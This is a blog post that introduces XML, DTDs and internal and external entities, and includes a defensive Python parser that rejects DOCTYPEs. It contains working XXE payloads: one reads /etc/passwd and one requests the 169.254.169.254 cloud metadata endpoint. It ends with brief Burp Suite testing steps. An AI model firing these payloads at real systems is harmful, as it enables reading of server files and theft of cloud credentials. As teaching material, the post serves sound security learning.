Markup Language: What is XML?

goay xuan hui
2 min read · Apr 5, 2021


What is XML?

XML (eXtensible Markup Language) is a markup language used for storing and transporting data.

XML data does not require any conversion when transferred between different systems, because the format is both platform-independent and programming-language-independent.

What do you need to know about XML?

Working with XML involves two important kinds of document:

#1 Document Type Definition (DTD) Document — Defines the structure, elements and the attributes of an XML document.

<!DOCTYPE note [
  <!ELEMENT note (to,from,heading,body)>
  <!ELEMENT to (#PCDATA)>        <!-- declares the "to" element to contain #PCDATA -->
  <!ELEMENT from (#PCDATA)>
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body (#PCDATA)>
]>

NOTE: #PCDATA means parsed character data, i.e. text that the parser reads and in which markup and entity references are interpreted.

#2 eXtensible Markup Language (XML) Document — Markup language used for storing and transporting data that is both human and machine readable.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>                        <!-- ROOT element (compulsory, exactly one per document) -->
  <to>falcon</to>             <!-- child element -->
  <from>feast</from>          <!-- child element -->
  <heading>hacking</heading>  <!-- child element -->
  <body>XXE attack</body>     <!-- child element -->
</note>

Another important construct in XML is the ENTITY. An entity is a named piece of content declared in the DTD; wherever the document references it (as &name;), the parser substitutes the entity's value, so an entity can effectively supply the value of an element. There are different types of entities:

  • Internal — Entity defined within the local DTD; its replacement text is given inline.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe "forexample">] >
<userInfo>
<firstName>John</firstName>
<lastName>&xxe;</lastName>
</userInfo>

Output: Hello John forexample

  • External — Entity defined outside of the local DTD through the use of the keyword “SYSTEM”; the parser fetches the replacement text from the given system identifier (a local file or a URL).

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">] >
<userInfo>
<firstName>John</firstName>
<lastName>&xxe;</lastName>
</userInfo>

Output: Hello John root:x:0:0:root

The system identifier can also be a URL, in which case the parser issues a request for it:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/">] >
<userInfo>
<firstName>John</firstName>
<lastName>&xxe;</lastName>
</userInfo>
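As an added example (not code from the original post), the following Python script uses only the standard library's expat bindings to show the three things the entity section above describes from the parser's side: a stock ElementTree parse expands an internal entity into its replacement text; a document's entity declarations can be listed and classified as internal or external without ever fetching an external one; and an untrusted document can be refused outright as soon as it declares a DOCTYPE, which is the standard mitigation because no DTD means no entity declarations of either kind. The sample documents and the file URI inside them are constructed placeholders.

```python
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET

# Constructed sample documents modelled on the examples above (not real data).
PLAIN_DOC = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<userInfo><firstName>John</firstName><lastName>Doe</lastName></userInfo>"
)
INTERNAL_DOC = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE foo [<!ENTITY xxe "forexample">] >'
    "<userInfo><firstName>John</firstName><lastName>&xxe;</lastName></userInfo>"
)
EXTERNAL_DOC = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    # placeholder system identifier; the code below never opens it
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///tmp/placeholder.txt">] >'
    "<userInfo><firstName>John</firstName><lastName>&xxe;</lastName></userInfo>"
)


class DoctypeForbidden(ValueError):
    """Raised when an untrusted document declares a DTD."""


def expand_with_elementtree(xml_text: str) -> str:
    """Return the text of <lastName> after a stock ElementTree parse.

    ElementTree's expat parser expands internal entities declared in the
    internal DTD subset, so &xxe; in INTERNAL_DOC comes back as "forexample".
    """
    return ET.fromstring(xml_text).find("lastName").text


def declared_entities(xml_text: str) -> list:
    """List every general entity declared in the document's internal DTD subset.

    External entities are reported, not fetched: no ExternalEntityRefHandler is
    installed on this parser, so expat skips the &xxe; reference in content.
    """
    found = []
    parser = expat.ParserCreate()

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        found.append({
            "name": name,
            "kind": "external" if system_id is not None else "internal",
            # an internal entity carries replacement text, an external one a system identifier
            "target": value if system_id is None else system_id,
        })

    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


def parse_untrusted(xml_text: str) -> ET.Element:
    """Parse untrusted XML, rejecting any document that declares a DOCTYPE.

    Without a DTD there can be no entity declarations, internal or external,
    so the ElementTree parse that follows cannot expand anything user-defined.
    """
    guard = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"document declares <!DOCTYPE {name}>; DTDs are not accepted")

    guard.StartDoctypeDeclHandler = on_doctype
    guard.Parse(xml_text, True)  # raises DoctypeForbidden before any entity is expanded
    return ET.fromstring(xml_text)


if __name__ == "__main__":
    print("stock parse of INTERNAL_DOC ->", expand_with_elementtree(INTERNAL_DOC))
    for doc in (INTERNAL_DOC, EXTERNAL_DOC):
        print(declared_entities(doc))
    print("plain document parses to root element", parse_untrusted(PLAIN_DOC).tag)
    try:
        parse_untrusted(EXTERNAL_DOC)
    except DoctypeForbidden as exc:
        print("rejected:", exc)
```

The guard pass is deliberately a separate, handler-only expat parser rather than a flag on ElementTree: it stops at the DOCTYPE declaration itself, before the parser has seen a single entity, so neither the replacement text of an internal entity nor the system identifier of an external one is ever acted on for a document that fails the check.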

Where to look for XML vulnerability?

  1. Test how the application works by submitting values through its form, with the interceptor in Burp Suite turned on so that you can see each request.
  2. If the intercepted request shows that the application is using XML to transport data, that input is a candidate for the XML injection tests described above.


goay xuan hui

A food lover, a cyber security enthusiast, a musician and a traveller, so you will see a mix of different contents in my blog. ☺️